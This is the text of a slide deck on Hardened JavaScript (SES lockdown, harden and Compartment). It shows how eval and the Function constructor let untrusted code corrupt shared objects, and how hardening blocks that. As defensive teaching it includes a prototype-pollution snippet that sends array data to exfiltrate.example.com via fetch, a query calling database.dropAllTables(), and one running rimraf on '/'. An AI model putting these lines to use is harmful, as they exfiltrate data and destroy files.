1
Hardened JavaScript
🧙♂️ Kris Kowal
🐦 @kriskowal
✉️ kris@agoric.com
DEC VT100 Terminal, Jason Scott
Interaction and Vulnerability
Netscape Navigator 1.22 on Windows
3
Interaction and Vulnerability
Running other people’s programs is dangerous, and some people will even tell you that you shouldn’t do it.
You can run other people’s programs safely.
The solution is Hardened JavaScript.
Ulysses and the Sirens, 1891, by John William Waterhouse
Interaction and Vulnerability
User Agent
5
User agents mediate interaction. A web browser is a user agent.
■ Browsers invite arbitrary programs off the internet to run on your computer.
■ Server sends a program to the client.
■ The client runs the program with limited access to local resources.
■ The browser mediates the interaction through its user interface “chrome”.
Motorcycle Reflections, Atoma
Two parties (client and server) are easy to safeguard, but not very interesting.
Within a user agent, multiple parties can send each other facets of APIs and interact directly with each other on behalf of the user.
■ Client engages two other services.
■ Client introduces one service to the other, to communicate on its behalf.
■ Browser mediates the interaction, including the ability to revoke communication between third-party services at any time.
Three is a Party
6
Granovetter Diagram
■ Sandbox
■ Unforgeable references
■ Closures
■ Run-to-completion event-loop
■ Strict mode
■ Hardenable by freezing
7
Why JavaScript
Queries are Hobbled Programs
Consider the case of a data service provider that accepts arbitrary programs instead of a weakened query language.
8
const search = query => {
  const matches = [];
  for (const item of database.items()) {
    // Direct eval runs the query in this scope, so it sees `item`, `database`, and everything else here.
    if (eval(query)) {
      matches.push(item);
    }
  }
  return matches;
};
// With great interaction…
search('item.price > 50 && item.size == 8');
// …comes great vulnerability.
search('database.dropAllTables(), false');
Eval is not exactly Evil
The Levenshtein Distance between Eval and Evil is not zero.
Eval is not Evil, QED.
E V I L
E 0 1 2 3
V 1 0 1 2
A 2 1 1 2
L 3 2 2 1
eval('var undefined = null');
console.log(undefined); // null
10
Direct Eval
11
const indirectEval = eval;
indirectEval('Math = 2 + 2');
// or:
(0, eval)('Array = Object');
console.log(globalThis.Array); // Object
Indirect Eval
new Function(
'value',
'globalThis.NaN = value' // 👈 siren song here
)(42);
console.log(NaN); // 42
12
Function Constructor
How Eval can be used for Evil
13
Let me count the ways.
■ To replace constructors with imposters,
■ To subvert methods on shared prototypes,
■ To distribute furtive missives on properties of unsuspecting objects,
■ To listen to activity through the walls with high resolution timers,
■ To hog local resources like memory or compute time,
■ To use powerful APIs to steal your private keys and scribble on your disk,
■ To run your kitchen sink garbage disposal at inopportune times,
■ To teach your pets to wage a guerrilla war for
Taming Eval
■ 🔒 Lockdown: Freeze every object the language provides, the shared primordials.
■ 🧊 Harden: Give programs a way to deep freeze the objects they share with other parties.
■ 📦 Compartment: Provide a way to make spaces that only have the shared primordials and other explicitly shared objects.
Give programs a firm foundation to stand on to defend their own integrity and confidentiality.
14
15
🔒 Lockdown
lockdown();
Object.isFrozen(Array); // true
Object.isFrozen(Array.prototype); // yes
Object.isFrozen(Object); // indeed
Object.isFrozen(Object.prototype); // verily
16
🧊 Harden
lockdown();
const me = {
ma: { ma: {}, pa: {} },
pa: { ma: {}, pa: {} },
};
harden(me);
Object.isFrozen(me); // true
Object.isFrozen(me.ma); // yes
Object.isFrozen(me.ma.ma); // indeed
Object.isFrozen(me.ma.pa); // verily
Object.isFrozen(me.pa); // quite
Object.isFrozen(me.pa.ma); // affirmative
Object.isFrozen(me.pa.pa); // indubitably
17
📦 Compartment
lockdown();
const compartment = new Compartment({ console });
harden(compartment.globalThis);
compartment.evaluate('console.log("Hello, World!");');
compartment.evaluate(`eval("console.log('Hi');")`);
compartment.evaluate('[]') instanceof Array; // totally
compartment.evaluate('{}') instanceof Object; // exactly
compartment.evaluate('globalThis') !== globalThis; // unique!
compartment.evaluate('Date.now()'); // NaN
compartment.evaluate('new Date()'); // Invalid Date
compartment.evaluate('Math.random'); // undefined
Within a Compartment
18
globalThis.NaN = 42;
Math = 2 + 2;
globalThis.undefined = null;
const push = Array.prototype.push;
Array.prototype.push = (...args) => {
fetch(`https://exfiltrate.example.com?${args}`);
return push.apply(this, args);
};
Attacker cannot pollute prototypes.
19
lockdown();
const compartment = new Compartment();
harden(compartment.globalThis);
const SafeFunction = compartment.globalThis.Function;
const search = harden(query => {
  // The query is an expression, so the compiled function must return its value.
  // SafeFunction only sees the compartment's frozen globals and its `item` parameter.
  const match = new SafeFunction('item', `return (${query});`);
  const matches = [];
  for (const item of database.items()) {
    if (match(harden(item))) {
      matches.push(item);
    }
  }
  return harden(matches);
});
Safe Queries & Hardened JavaScript
20
// With great interaction…
search('item.price > 50 && item.size == 8');
// ReferenceError: database
search('database.dropAllTables(), false');
// Cannot assign
search('Array.prototype.push = mitm');
// ReferenceError: require
search('require("rimraf")("/")');
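The safe-query shape from the two slides above, as an added runnable example that is not from the talk or the ses package. `harden` here is a minimal own-property deep freeze standing in for SES harden (it does not walk prototype chains, which is what lockdown() covers for the primordials); the plain Function constructor stands in for the Compartment's SafeFunction, which cannot see the closure variable `database` but, unlike a Compartment, still sees the real globals; the database is constructed sample data.

```javascript
'use strict';

// Minimal stand-in for SES harden(): freeze an object and everything reachable
// through its own properties (data values, getters, setters). Unlike the real
// harden() it does not walk prototype chains; lockdown() is what freezes the
// shared primordials. Not the ses package's implementation.
function harden(root) {
  const seen = new Set();
  const todo = [root];
  while (todo.length > 0) {
    const obj = todo.pop();
    if (obj === null || (typeof obj !== 'object' && typeof obj !== 'function')) continue;
    if (seen.has(obj)) continue;
    seen.add(obj);
    Object.freeze(obj);
    for (const key of Reflect.ownKeys(obj)) {
      const desc = Object.getOwnPropertyDescriptor(obj, key);
      if ('value' in desc) todo.push(desc.value);
      else todo.push(desc.get, desc.set);
    }
  }
  return root;
}

// Build a search function over a database. The query is compiled into a
// function whose only parameter is `item`; `database` is a closure variable
// here, so a query compiled with the Function constructor cannot name it.
function makeSearch(database) {
  // Assumption: plain Function stands in for the slide's SafeFunction taken
  // from a Compartment. It still sees the real globalThis, so without
  // lockdown() a query could still reach Array.prototype; the Compartment
  // plus lockdown() closes that gap. The strict-mode directive makes writes
  // to hardened (frozen) items throw instead of failing silently.
  return harden(query => {
    const match = new Function('item', `"use strict"; return (${query});`);
    const matches = [];
    for (const item of database.items()) {
      if (match(harden(item))) matches.push(item);
    }
    return harden(matches);
  });
}

// Run one query and report the outcome as data rather than printing it.
function runQuery(search, query) {
  try {
    return { ok: true, ids: search(query).map(item => item.id) };
  } catch (err) {
    return { ok: false, error: err.constructor.name };
  }
}

// Constructed sample database, not from the talk.
const sampleDatabase = {
  items: () => [
    { id: 1, price: 20, size: 8 },
    { id: 2, price: 75, size: 8 },
    { id: 3, price: 90, size: 10 },
  ],
  dropAllTables: () => { throw new Error('must be unreachable from a query'); },
};

const search = makeSearch(sampleDatabase);

// Benign query matches item 2; the hostile ones fail before doing harm:
// `database` is not in the query's scope (ReferenceError) and the item is
// frozen, so a write to it throws (TypeError).
runQuery(search, 'item.price > 50 && item.size == 8');
runQuery(search, 'database.dropAllTables(), false');
runQuery(search, 'item.price = 0, true');
```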
Identity Discontinuity
21
const matches = search(
'item.price > 50 && item.size == 8'
);
matches instanceof Array // no!?
22
LavaMoat and mitigating supply chain attacks
https://github.com/LavaMoat/LavaMoat
23
https://github.com/endojs/endo
24
https://github.com/endojs/endo/packages/ses
25
https://www.moddable.com/
26
Hardened JavaScript
Hardened JavaScript in the Agoric Architecture
27
modulecounts.com
28
npm-stats.com for q
Conclusion
29
Hardened JavaScript
https://github.com/endojs/endo
lockdown();
const compartment = new Compartment();
const sing = compartment.evaluate(sirenSong);
sing({
enjoyMusic() { /* … */ },
// drownYourself() { /* … */ },
});
30
Hardened
JavaScript
https://github.com/endojs/endo
$ npm install ses
🧙♂️ Kris Kowal 🐦 @kriskowal ✉️ kris@agoric.com